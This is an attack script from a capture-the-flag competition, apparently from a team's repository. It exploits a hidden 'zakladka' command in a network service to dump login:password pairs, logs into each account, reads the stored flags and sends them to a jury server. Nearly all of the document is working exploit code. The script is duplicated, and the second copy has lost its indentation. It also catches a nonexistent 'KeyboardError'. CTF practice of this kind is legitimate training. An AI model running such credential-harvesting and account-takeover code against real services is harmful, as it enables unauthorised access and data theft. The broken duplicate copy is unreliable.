mrcat323/pwn.py

## pwn.py
#!/usr/bin/env python3
import socket, sys, re
from time import sleep
s = socket.socket()
s.connect((sys.argv[1], 6666))  # connect to service, ip in first script arg

# Recv until string occurs
def recv_until(s, st):
    buf = ''
    while True:
        buf += s.recv(100500).decode()
        if st in buf:
            break
    return buf

recv_until(s, 'Enter your name:')
s.send(b'asd\n')  # login
recv_until(s, '\n> ')
s.send(b'zakladka\n')  # vulnerable command in service
l = recv_until(s, '\n> ')  # get list of credentials in login1:password1\nlogin2:password2 format
creds = l.split('\n')
s.close()

for cred in creds:  # for each login:password in list
  try:
    s2 = socket.socket()  # open new connection
    s2.connect((sys.argv[1], 6666))  # and connect to the service
    recv_until(s2, 'Enter your name:')
    s2.send(cred.split(':')[0].strip().encode() + b'\n')  # enter login
    sleep(0.5)
    asd = s2.recv(100500).decode()
    if "access to the premium functions" in asd:  # if this account not contain flag
        print('not valid')
        continue  # go to the next account
    s2.send(cred.split(':')[1].strip().encode() + b'\n')  # else send password
    recv_until(s2, '\n> ')
    s2.send(b'see\n')  # view flag
    flag = recv_until(s2, '\n> ')
    jury = socket.socket()
    jury.connect(('192.168.0.185', 31337))  # connect to jury
    recv_until(jury, '\n')  # get hello message
    jury.send(re.findall('(\w{31}=)', flag)[0].encode() + b'\n')  # send flag
    print(jury.recv(100500).decode())  # print jury answer
    s2.close()
  except KeyboardError:  # for ctrl-c exit
    break
  except:
    continue  # if something wrong go next
	#!/usr/bin/env python3
	import socket, sys, re
	from time import sleep
	s = socket.socket()
	s.connect((sys.argv[1], 6666)) # connect to service, ip in first script arg

	# Recv until string occurs
	def recv_until(s, st):
	buf = ''
	while True:
	buf += s.recv(100500).decode()
	if st in buf:
	break
	return buf

	recv_until(s, 'Enter your name:')
	s.send(b'asd\n') # login
	recv_until(s, '\n> ')
	s.send(b'zakladka\n') # vulnerable command in service
	l = recv_until(s, '\n> ') # get list of credentials in login1:password1\nlogin2:password2 format
	creds = l.split('\n')
	s.close()

	for cred in creds: # for each login:password in list
	try:
	s2 = socket.socket() # open new connection
	s2.connect((sys.argv[1], 6666)) # and connect to the service
	recv_until(s2, 'Enter your name:')
	s2.send(cred.split(':')[0].strip().encode() + b'\n') # enter login
	sleep(0.5)
	asd = s2.recv(100500).decode()
	if "access to the premium functions" in asd: # if this account not contain flag
	print('not valid')
	continue # go to the next account
	s2.send(cred.split(':')[1].strip().encode() + b'\n') # else send password
	recv_until(s2, '\n> ')
	s2.send(b'see\n') # view flag
	flag = recv_until(s2, '\n> ')
	jury = socket.socket()
	jury.connect(('192.168.0.185', 31337)) # connect to jury
	recv_until(jury, '\n') # get hello message
	jury.send(re.findall('(\w{31}=)', flag)[0].encode() + b'\n') # send flag
	print(jury.recv(100500).decode()) # print jury answer
	s2.close()
	except KeyboardError: # for ctrl-c exit
	break
	except:
	continue # if something wrong go next